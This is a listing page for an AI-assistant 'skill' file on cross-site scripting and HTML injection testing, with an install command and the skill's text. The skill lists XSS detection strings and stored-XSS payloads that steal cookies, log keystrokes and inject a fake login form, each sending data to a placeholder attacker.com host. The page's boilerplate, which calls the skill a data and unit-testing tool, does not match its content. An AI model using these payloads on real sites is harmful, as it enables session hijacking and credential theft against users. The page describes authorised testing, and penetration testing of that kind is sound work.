Z
zebbern
@mayurrathi
⭐ 40.7k GitHub stars

Xss Html Injection

Xss Html Injection is an data AI skill with a core value of This skill should be used when the user asks to \"test for XSS vulnerabilities\", \"perform cross-site scripting attacks\", \"identify HTML injection flaws\", \"exploit client-side injection. It helps developers solve real-world problems in the data domain, boosting efficiency, automating repetitive tasks, and optimizing workflows.

This skill should be used when the user asks to \"test for XSS vulnerabilities\", \"perform cross-site scripting attacks\", \"identify HTML injection flaws\", \"exploit client-side injection...

Last verified on: 2026-07-07

Quick Facts

Category data
Works With Claude
Source sickn33/antigravity-awesome-skills
Stars ⭐ 40.7k
Last Verified 2026-07-07
Risk Level High
mkdir -p ./skills/xss-html-injection && curl -sfL https://raw.githubusercontent.com/sickn33/antigravity-awesome-skills/main/skills/xss-html-injection/SKILL.md -o ./skills/xss-html-injection/SKILL.md

Run in terminal / PowerShell. Requires curl (Unix) or PowerShell 5+ (Windows).

Skill Content

# Cross-Site Scripting and HTML Injection Testing


Purpose


Execute comprehensive client-side injection vulnerability assessments on web applications to identify XSS and HTML injection flaws, demonstrate exploitation techniques for session hijacking and credential theft, and validate input sanitization and output encoding mechanisms. This skill enables systematic detection and exploitation across stored, reflected, and DOM-based attack vectors.


Inputs / Prerequisites


Required Access

- Target web application URL with user input fields

- Burp Suite or browser developer tools for request analysis

- Access to create test accounts for stored XSS testing

- Browser with JavaScript console enabled


Technical Requirements

- Understanding of JavaScript execution in browser context

- Knowledge of HTML DOM structure and manipulation

- Familiarity with HTTP request/response headers

- Understanding of cookie attributes and session management


Legal Prerequisites

- Written authorization for security testing

- Defined scope including target domains and features

- Agreement on handling of any captured session data

- Incident response procedures established


Outputs / Deliverables


- XSS/HTMLi vulnerability report with severity classifications

- Proof-of-concept payloads demonstrating impact

- Session hijacking demonstrations (controlled environment)

- Remediation recommendations with CSP configurations


Core Workflow


Phase 1: Vulnerability Detection


#### Identify Input Reflection Points

Locate areas where user input is reflected in responses:


text
# Common injection vectors
- Search boxes and query parameters
- User profile fields (name, bio, comments)
- URL fragments and hash values
- Error messages displaying user input
- Form fields with client-side validation only
- Hidden form fields and parameters
- HTTP headers (User-Agent, Referer)

#### Basic Detection Testing

Insert test strings to observe application behavior:


html
<!-- Basic reflection test -->
<test123>

<!-- Script tag test -->
<script>alert('XSS')</script>

<!-- Event handler test -->
<img src=x onerror=alert('XSS')>

<!-- SVG-based test -->
<svg onload=alert('XSS')>

<!-- Body event test -->
<body onload=alert('XSS')>

Monitor for:

- Raw HTML reflection without encoding

- Partial encoding (some characters escaped)

- JavaScript execution in browser console

- DOM modifications visible in inspector


#### Determine XSS Type


**Stored XSS Indicators:**

- Input persists after page refresh

- Other users see injected content

- Content stored in database/filesystem


**Reflected XSS Indicators:**

- Input appears only in current response

- Requires victim to click crafted URL

- No persistence across sessions


**DOM-Based XSS Indicators:**

- Input processed by client-side JavaScript

- Server response doesn't contain payload

- Exploitation occurs entirely in browser


Phase 2: Stored XSS Exploitation


#### Identify Storage Locations

Target areas with persistent user content:


text
- Comment sections and forums
- User profile fields (display name, bio, location)
- Product reviews and ratings
- Private messages and chat systems
- File upload metadata (filename, description)
- Configuration settings and preferences

#### Craft Persistent Payloads


html
<!-- Cookie stealing payload -->
<script>
document.location='http://attacker.com/steal?c='+document.cookie
</script>

<!-- Keylogger injection -->
<script>
document.onkeypress=function(e){
  new Image().src='http://attacker.com/log?k='+e.key;
}
</script>

<!-- Session hijacking -->
<script>
fetch('http://attacker.com/capture',{
  method:'POST',
  body:JSON.stringify({cookies:document.cookie,url:location.href})
})
</script>

<!-- Phishing form injection -->
<div id="login">
<h2>Session Expired - Please Login</h2>
<form action="http://attacker.com/phish" method="POST">
Username: <input name="user"><br>
Password: <input type="password" name="pass"><br>
<input type="submit" value="Login">
</form>

🎯 Best For

  • QA engineers
  • Developers writing unit tests
  • Claude users
  • Data professionals
  • Analytics teams

💡 Use Cases

  • Generating test cases for edge conditions
  • Writing integration test suites
  • Data pipeline auditing
  • Query optimization

📖 How to Use This Skill

  1. 1

    Install the Skill

    Copy the install command from the Terminal tab and run it. The SKILL.md file downloads to your local skills directory.

  2. 2

    Load into Your AI Assistant

    Open Claude and reference the skill. Paste the SKILL.md content or use the system prompt tab.

  3. 3

    Apply Xss Html Injection to Your Work

    Provide context for your task — paste source material, describe your audience, or share existing work to guide the AI.

  4. 4

    Review and Refine

    Edit the AI output for accuracy, tone, and completeness. Add human insight where the AI lacks context.

❓ Frequently Asked Questions

Does this generate test mocks?

Many testing skills include mock generation. Check the install command and skill content for details.

How do I install Xss Html Injection?

Copy the install command from the Terminal tab and run it. The skill downloads to ./skills/xss-html-injection/SKILL.md, ready to use.

Can I customize this skill for my team?

Absolutely. Edit the SKILL.md file to add team-specific instructions, examples, or workflows.

⚠️ Common Mistakes to Avoid

Not testing edge cases

AI tends to generate happy-path tests. Manually review for boundary conditions.

Ignoring data quality

AI analysis inherits all data quality issues — profile your data first.

🔗 Related Skills